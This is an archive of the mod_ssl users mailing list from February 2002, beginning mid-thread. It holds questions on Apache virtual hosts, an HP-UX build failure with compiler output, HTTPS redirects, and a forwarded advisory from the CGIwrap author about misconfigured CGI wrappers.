they can steal a cert, they can > > steal your customer's private data - exposing you to a liability issue). > > So if you protect your server to the utmost, you have no need of a > > password protected certificate. > > > s/certificate/private key/g, and this matches my sentiments exactly. > Passphrases just give a false sense of security. > Cool, since the vast majority of websites are run insecurely, and most folks putting up a server install all the little toys and trinkets of the underlying OS distributions they choose to run, and since many of these sites run insecure off the shelf freebie scripts, just give out the most insecure pointers they can actually allow, and make the issue of security of any aspect for them a moot point. Thanks, Ron DuFresne -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 03:04:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA13699; Thu, 7 Feb 2002 03:03:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id DAA13669; Thu, 7 Feb 2002 03:02:39 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id CDA9D4CE73A; Thu, 7 Feb 2002 03:02:38 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g16Ijj655001; Wed, 6 Feb 2002 19:45:45 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tomts15-srv.bellnexxia.net id TAA21684; Wed, 6 Feb 2002 19:38:38 +0100 (MET) Received: from voltzwattz ([64.231.67.78]) by tomts15-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20020206183836.BDP4237.tomts15-srv.bellnexxia.net@voltzwattz> for ; Wed, 6 Feb 2002 13:38:36 -0500 Message-ID: <002a01c1af3b$e9adb050$4e43e740@voltzwattz> From: "Eduardo Gomez" To: References: <3C5F99E9.F0F057A9@bourse.ch> Subject: simple name-based virtual host tutorial, PLEASE Date: Wed, 6 Feb 2002 13:27:17 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Eduardo Gomez" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Can someone PLEASE post a simple tutorial on how to set domain name-based virtual hosts with apache for windows??. I've been trying many things and I just cant get it right. What is confusing me is how the following general config. lines interact or have conflic with each other: -Listen -BindAdress -ServerName -DocumentRoot And on the virtual hosts commands, what's really confusing me is how to enter the correct path in the "DocumentRoot" line within the tags. Example: DocumentRoot path <--this line If my main DocumentRoot, specified in the general configuration is: "C:\webapps\apache\htdocs" and my virtual host folder is "C:\webapps\apache\htdocs\subfolder" what do I enter in the line above ??? Any help would be appreciated. Please, Gurus, be kind to the unexperienced, but willing to learn :) _______________ Eduardo Gomez Innerlab Productions www.innerlab.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 03:04:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA13708; Thu, 7 Feb 2002 03:03:38 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id DAA13665; Thu, 7 Feb 2002 03:02:39 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 7129D4CE6E0; Thu, 7 Feb 2002 03:02:38 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g16IjDL54983; Wed, 6 Feb 2002 19:45:13 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from apollo.fedworld.gov id RAA14959; Wed, 6 Feb 2002 17:56:52 +0100 (MET) Received: from phosmane ([208.232.200.73]) by apollo.fedworld.gov (8.9.3 (PHNE_25183)/8.8.6) with SMTP id LAA13321 for ; Wed, 6 Feb 2002 11:56:12 -0500 (EST) From: "PAD HOSMANE" To: Subject: problem with configure on mod_ssl 2.8.6 with apache 1.3.23. Date: Wed, 6 Feb 2002 12:00:59 -0500 Message-ID: X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "PAD HOSMANE" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I am trying to configure mod_ssl with apache_1.3.23 on HP-UX 11.00, gcc 3.0.1. I get "Execute permission denied" as shown below, I get this error when i give CC="gcc shared -fpic" while i run configure as shown below under "OUTPUT OF configure in Mod_ssL". When I run make from apache_1.3.23 directory, it also fails to compile with error as execution permission denied on some script as show below (I am running as root). Any help is appreciated. If i dont give CC="gcc -share -fpic", then i dont get error, but when i run make in apache_1.3.23 directory it gives while linking: +++++++++++++++++++++++++++++++++++++++++ ld -L/usr/local/bin/openssl0.9.6c/lib -b -o libssl.so mod_ssl.lo ssl_engine_config.lo ssl_engine_compat.lo ssl_engine_ds.lo ssl_engine_dh.lo ssl_engine_init.lo ssl_engine_kernel.lo ssl_engine_rand.lo ssl_engine_io.lo ssl_engine_log.lo ssl_engine_mutex.lo ssl_engine_pphrase.lo ssl_engine_vars.lo ssl_engine_ext.lo ssl_scache.lo ssl_scache_dbm.lo ssl_scache_shmht.lo ssl_scache_shmcb.lo ssl_expr.lo ssl_expr_scan.lo ssl_expr_parse.lo ssl_expr_eval.lo ssl_util.lo ssl_util_ssl.lo ssl_util_sdbm.lo ssl_util_table.lo -ldbm -lssl -lcrypto -L/opt/gcc/lib/gcc-lib/hppa2.0n-hp-h pux11.00/3.0.1 -lgcc ld: DP relative code in file /usr/local/bin/openssl0.9.6c/lib/libssl.sl(s2_srvr.o) - shared library must be position independent. Use +z or +Z to recompile. make[4]: *** [libssl.so] Error 1 make[3]: *** [all] Error 1 make[2]: *** [subdirs] Error 1 make[2]: Leaving directory `/opt/down/apache_1.3.23/src' make[1]: *** [build-std] Error 2 make[1]: Leaving directory `/opt/down/apache_1.3.23' make: *** [build] Error 2 +++++++++++++++++++++++++++++++++++++++ OUTPUT OF configure in mod_ssl ------------------------------ ./configure --enable-module=ssl --with-apache=/opt/down/apache_1.3.23 --with -ssl=/usr/local/bin/openssl0.9.6c --with-mm=/usr/local/bin/mm-1.1.3 --enable -shared=ssl --enable-rule=EAPI --p refix=/usr/local/bin/apache_1.2.23 Configuring mod_ssl/2.8.6 for Apache/1.3.23 + Apache location: /opt/down/apache_1.3.23 (Version 1.3.23) + OpenSSL location: /usr/local/bin/openssl0.9.6c + MM location: /usr/local/bin/mm-1.1.3 + Auxiliary patch tool: ./etc/patch/patch (local) + Applying packages to Apache source tree: o Extended API (EAPI) o Distribution Documents o SSL Module Source o SSL Support o SSL Configuration Additions o SSL Module Documentation o Addons Done: source extension and patches successfully applied. Configuring for Apache, Version 1.3.23 + using installation path layout: Apache (config.layout) Creating Makefile Creating Configuration.apaci in src + enabling mod_so for DSO support Creating Makefile in src + configured for HP-UX 11 platform + setting C pre-processor to gcc -shared -fpic -E + checking for system header files + adding selected modules o ssl_module uses ConfigStart/End + SSL interface: mod_ssl/2.8.6 + SSL interface build type: DSO + SSL interface compatibility: enabled + SSL interface experimental code: disabled + SSL interface conservative code: disabled + SSL interface vendor extensions: disabled + SSL interface plugin: Configured DBM (-ldbm) + SSL library path: /usr/local/bin/openssl0.9.6c + SSL library version: OpenSSL 0.9.6c 21 dec 2001 + SSL library type: installed package (stand-alone) + enabling Extended API (EAPI) using MM library: /usr/local/bin/mm-1.1.3 (installed) + using builtin Expat ./helpers/TestCompile: /opt/down/apache_1.3.23/src/helpers/testfunc: Execute permission denied. ./helpers/TestCompile: /opt/down/apache_1.3.23/src/helpers/testfunc: Execute permission denied. ./helpers/TestCompile: /opt/down/apache_1.3.23/src/helpers/testfunc: Execute permission denied. ./helpers/TestCompile: /opt/down/apache_1.3.23/src/helpers/testfunc: Execute permission denied. ./helpers/TestCompile: /opt/down/apache_1.3.23/src/helpers/testfunc: Execute permission denied. + checking sizeof various data types + doing sanity check on compiler and options Creating Makefile in src/support Creating Makefile in src/regex Creating Makefile in src/os/unix Creating Makefile in src/ap Creating Makefile in src/main Creating Makefile in src/lib/expat-lite Creating Makefile in src/modules/standard Creating Makefile in src/modules/ssl Now proceed with the following commands: $ cd /opt/down/apache_1.3.23 $ make $ make certificate $ make install bash-2.05# gcc -v END OF OUTPUT FOR configure in mod_ssl DIRECTORY ---------------------------------------------------------------------------- -------------------- OUTPUT OF make in apache_1.3.23 -------------------------------- make ===> src make[1]: Entering directory `/opt/down/apache_1.3.23' make[2]: Entering directory `/opt/down/apache_1.3.23/src' ===> src/regex make[3]: Nothing to be done for `all'. <=== src/regex ===> src/os/unix gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../../os/unix -I../ ../include -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_ EXPAT -I../../lib/expat-lite `../../apaci` os.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../../os/unix -I../ ../include -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_ EXPAT -I../../lib/expat-lite `../../apaci` os-inline.c rm -f libos.a ar cr libos.a os.o os-inline.o /bin/true libos.a <=== src/os/unix ===> src/ap gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_cpystrn.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_execve.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_fnmatch.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_getpass.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_md5c.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_signal.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_slack.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_snprintf.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_sha1.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_checkpass.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_base64.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_ebcdic.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_hook.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_ctx.c gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` ap_mm.c rm -f libap.a ar cr libap.a ap_cpystrn.o ap_execve.o ap_fnmatch.o ap_getpass.o ap_md5c.o ap_signal.o ap_slack.o ap_snprintf.o ap_sha1.o ap_checkpass.o ap_base64.o ap_ebcdic.o ap_hook.o ap_ctx.o ap_mm.o /bin/true libap.a <=== src/ap ===> src/main gcc -shared -fpic -c -I/usr/local/bin/mm-1.1.3/include -I../os/unix -I../inc lude -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` gen_test_char.cgcc -shared -fpic -DHPUX11 -DMOD_SSL=208106 -DUSE_HSREGEX -D EAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite `../apaci` -L/usr/local/bin/mm-1.1.3/lib -o gen_test_char en_test_char.o -lm -lpthread -lmm ./gen_test_char >test_char.h /usr/bin/sh: ./gen_test_char: Execute permission denied. make[3]: *** [test_char.h] Error 1 make[2]: *** [subdirs] Error 1 make[2]: Leaving directory `/opt/down/apache_1.3.23/src' make[1]: *** [build-std] Error 2 make[1]: Leaving directory `/opt/down/apache_1.3.23' make: *** [build] Error 2 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 03:17:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA14625; Thu, 7 Feb 2002 03:16:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from toms.net id DAA14589; Thu, 7 Feb 2002 03:15:10 +0100 (MET) Received: from Toms.NET (Toms.NET [64.149.228.95]) by toms.net (8.12.1/8.12.1) with ESMTP id g172F9Sp019097 for ; Wed, 6 Feb 2002 21:15:09 -0500 Date: Wed, 6 Feb 2002 21:15:09 -0500 (EST) From: Tom Oehser To: modssl-users@modssl.org Subject: Was: simple name-based virtual host tutorial, PLEASE Now: please help me to better flame off-topic posters In-Reply-To: <002a01c1af3b$e9adb050$4e43e740@voltzwattz> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Tom Oehser X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Can someone PLEASE post a simple tutorial on how to set domain name-based > virtual hosts with apache for windows??. I've been trying many things and I Could someone PLEASE post a simple tutorial on flaming off-topic inappropriate posts that have nothing to do with the list topic? I've been trying many different kinds of flames, but I still can't get them to understand that first you do a modicum of your own research and RTFM, then you post a question to an appropriate topical list, or else the very experts you are asking for help will ignore you and be annoyed. I think maybe if I just were better at flaming them, they would stop. Please help. -Tom ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 03:54:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA15805; Thu, 7 Feb 2002 03:53:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tomts20-srv.bellnexxia.net id DAA15801; Thu, 7 Feb 2002 03:53:04 +0100 (MET) Received: from voltzwattz ([64.231.64.211]) by tomts20-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20020207025302.JTCA9253.tomts20-srv.bellnexxia.net@voltzwattz> for ; Wed, 6 Feb 2002 21:53:02 -0500 Message-ID: <001801c1af80$fcef2410$d340e740@voltzwattz> From: "Eduardo Gomez" To: References: Subject: Re: simple name-based virtual host tutorial, PLEASE Now: please help me to better flame off-topic posters Date: Wed, 6 Feb 2002 21:41:43 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Eduardo Gomez" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Could someone PLEASE post a simple tutorial on flaming off-topic > inappropriate posts that have nothing to do with the list topic? Haha, that was funny... You're right, I sent this by accident to 2 lists (one is this one) Sorry...i'll see that it doesn't happen again :) ______________ Eduardo Gomez Innerlab Productions www.innerlab.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 04:29:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA17422; Thu, 7 Feb 2002 04:28:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id EAA17409; Thu, 7 Feb 2002 04:27:13 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id WAA11679 for ; Wed, 6 Feb 2002 22:33:29 -0500 Date: Wed, 6 Feb 2002 22:33:29 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: simple name-based virtual host tutorial, PLEASE Now: please help me to better flame off-topic posters In-Reply-To: <001801c1af80$fcef2410$d340e740@voltzwattz> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wed, 6 Feb 2002, Eduardo Gomez wrote: > > Could someone PLEASE post a simple tutorial on flaming off-topic > > inappropriate posts that have nothing to do with the list topic? > > Haha, that was funny... > You're right, I sent this by accident to 2 lists (one is this one) > Sorry...i'll see that it doesn't happen again :) You can lead a horse to google.net, but ya can't make em typo in the incorrect search parms... Thanks, Ron DuFresne -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 09:43:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA00585; Thu, 7 Feb 2002 09:42:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA00529; Thu, 7 Feb 2002 09:41:05 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 5361D4CE748; Thu, 7 Feb 2002 09:41:05 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g176ATw63711; Thu, 7 Feb 2002 07:10:29 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mx.rollanet.org id BAA09758; Thu, 7 Feb 2002 01:24:47 +0100 (MET) Received: (qmail 14684 invoked from network); 7 Feb 2002 00:24:44 -0000 Received: from cessna.rollanet.org (HELO umr.edu) (nneul@216.229.93.21) by mx.rollanet.org with SMTP; 7 Feb 2002 00:24:44 -0000 Message-ID: <3C61C94C.98DFFD89@umr.edu> Date: Wed, 06 Feb 2002 18:24:44 -0600 From: Nathan Neulinger X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.4.15-pre4 i686) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: [Fwd: Insecure installations of cgi wrappers (RTFM people!)] Content-Type: multipart/mixed; boundary="------------6FBBA4FC7592749009427256" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Nathan Neulinger X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. --------------6FBBA4FC7592749009427256 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit FYI, It was requested that I forward this to this modssl list. -- Nathan ------------------------------------------------------------ Nathan Neulinger EMail: nneul@umr.edu University of Missouri - Rolla Phone: (573) 341-4841 Computing Services Fax: (573) 341-4216 --------------6FBBA4FC7592749009427256 Content-Type: message/rfc822 Content-Disposition: inline Message-ID: <3C5F3EF9.1FABA220@umr.edu> Date: Mon, 04 Feb 2002 20:10:01 -0600 From: Nathan Neulinger X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.4.15-pre4 i686) X-Accept-Language: en MIME-Version: 1.0 To: bugtraq@securityfocus.com, cgiwrap@unixtools.org, dev@httpd.apache.org Subject: Insecure installations of cgi wrappers (RTFM people!) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit This isn't really a reporting of a vulnerability, it's more a reporting of mind-bogglingly foolish administrators that refuse to follow installation instructions and read the documentation. (I've cc'd this to both the cgiwrap and apache development mailing lists, but I'm sure certain it's not news to readers of either.) Note the following from cgiwrap documentation: --- *VERY IMPORTANT* - Do NOT allow any non-trusted user to run scripts directly out of the main cgi-bin directory, as this will allow them to use cgiwrap to run any of the other users scripts. The reason for this is that if they can run scripts as the same userid as the web server, they can subvert some of cgiwrap's security checks to allow them to run other users scripts. I recommend not running ANY scripts on the web server directly, once you have cgiwrap installed. --- I FREQUENTLY receive messages like this: --- Hi : My web host provides us with CgiWrap access. However they only treat scripts installed inside cgi-bin to run as user me and not nobody. I wanted to know if there is a way to get CgiWrap to get scripts installed outside cgi-bin to run as user me, and not nobody ? --- What that tell's me is that web host is a security disaster waiting to happen because they are allowing both cgiwrap and scripts run directly from cgi-bin. It won't necessarily give root or anything like that, but it allows cgi scripts to have their environment COMPLETELY subverted. If there are any scripts that rely upon the authentication or access control provided by the web server (such as scripts to administer the contents of databases), they can be subverted simply because all of that information is passed via environment variables. I hate to see cgiwrap or apache/suexec or any of the other wrappers get the blame for administrators not reading the documentation. About the only way I can think of getting around this problem would be to have some sort of web-server -> cgi-wrapper token passing taking place with a shared secret compiled into the wrapper executable, combined with non-readable wrapper executables and web server config. (And I haven't thought about it enough to be sure that wouldn't be exploitable. With some of the ptrace stuff, I'd bet it probably could be exploited pretty quick.) To my knowledge, none of the wrappers are currently doing anything like this. CGIwrap most certainly isn't. -- Nathan (Author of CGIwrap) ------------------------------------------------------------ Nathan Neulinger EMail: nneul@umr.edu University of Missouri - Rolla Phone: (573) 341-4841 Computing Services Fax: (573) 341-4216 --------------6FBBA4FC7592749009427256-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 09:55:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA01317; Thu, 7 Feb 2002 09:54:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from qeo02001.t-online.net id JAA01288; Thu, 7 Feb 2002 09:53:49 +0100 (MET) Received: from qeo01007.da.t-online.net (qeo01007.da.t-online.net [192.168.197.4]) by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id JAA02542 for ; Thu, 7 Feb 2002 09:53:28 +0100 Received: from qeo01006.da.t-online.net ([192.168.197.66]) by qeo01007.da.t-online.net (Netscape Messaging Server 4.15) with ESMTP id GR5ND401.81K for ; Thu, 7 Feb 2002 09:53:28 +0100 Received: from t-online.net ([192.168.193.21]) by qeo01006.da.t-online.net (Netscape Messaging Server 4.15) with ESMTP id GR5ND303.50A for ; Thu, 7 Feb 2002 09:53:27 +0100 Message-ID: <3C624087.CF0FC4C2@t-online.net> Date: Thu, 07 Feb 2002 09:53:27 +0100 From: "Bert Courtin" Organization: T-Online International AG X-Sender: "Bert Courtin" X-Mailer: Mozilla 4.51 [de]C-CCK-MCD DTOS 1999062601 IT/DV NBE (WinNT; U) X-Accept-Language: de,en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: simple name-based virtual host tutorial, PLEASE References: <3C5F99E9.F0F057A9@bourse.ch> <002a01c1af3b$e9adb050$4e43e740@voltzwattz> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bert Courtin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, see http://httpd.apache.org/docs/vhosts/examples.html Kind regards, Bert Eduardo Gomez schrieb: > Can someone PLEASE post a simple tutorial on how to set domain name-based > virtual hosts with apache for windows??. I've been trying many things and I > just cant get it right. What is confusing me is how the following general > config. lines interact or have conflic with each other: > > -Listen > -BindAdress > -ServerName > -DocumentRoot > > And on the virtual hosts commands, what's really confusing me is how to > enter the correct path in the "DocumentRoot" line within the > tags. Example: > > > DocumentRoot path <--this line > > > If my main DocumentRoot, specified in the general configuration is: > "C:\webapps\apache\htdocs" > and my virtual host folder is > "C:\webapps\apache\htdocs\subfolder" > what do I enter in the line above ??? Any help would be appreciated. > > Please, Gurus, be kind to the unexperienced, but willing to learn :) > > _______________ > Eduardo Gomez > Innerlab Productions > www.innerlab.com > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- T-Online International AG DCM Waldstrasse 3 64331 Weiterstadt Tel.: +49 (0)6151 680 7512 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 11:20:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA05497; Thu, 7 Feb 2002 11:19:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from echo.fssc.co.uk id LAA05479; Thu, 7 Feb 2002 11:18:32 +0100 (MET) Received: from hermes.nt.fssc.co.uk (hermes.nt.fssc.co.uk) by echo.fssc.co.uk (Content Technologies SMTPRS 4.2.5) with ESMTP id for ; Thu, 7 Feb 2002 10:25:27 +0000 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1AFC0.C7CE960E" Date: Thu, 7 Feb 2002 10:18:26 -0000 content-class: urn:content-classes:message X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Message-ID: Thread-Index: AcGvh8caEpDT0fgUT1alxiRsDpnY4gANe2Hw From: "Farooq Khan (Contractor - Production Services)" To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Farooq Khan (Contractor - Production Services)" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------_=_NextPart_001_01C1AFC0.C7CE960E Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi, =20 I hope this is the correct forum for my query. =20 I have installed apache with mod_ssl. Briefly, I want all http requests to a particular VirtualHost to be redirected to https for the same VirtualHost. Do I use mod_rewrite to do this? =20 I have set up 4 VirtualHosts in the order: All https://d.com requests work fine. I want all http://d.com to be redirected to https://d.com but they are defaulting to http://a.com . =20 I guess one solution might be to place the container at the top of the VirtualHost container list in httpd.conf but I want the general default to be a.com:80. =20 I thought this would be straightforward but I dunno how to do it. =20 Appreciate any help. Cheers, =20 Farooq Khan Mob: +44 7771 981 946 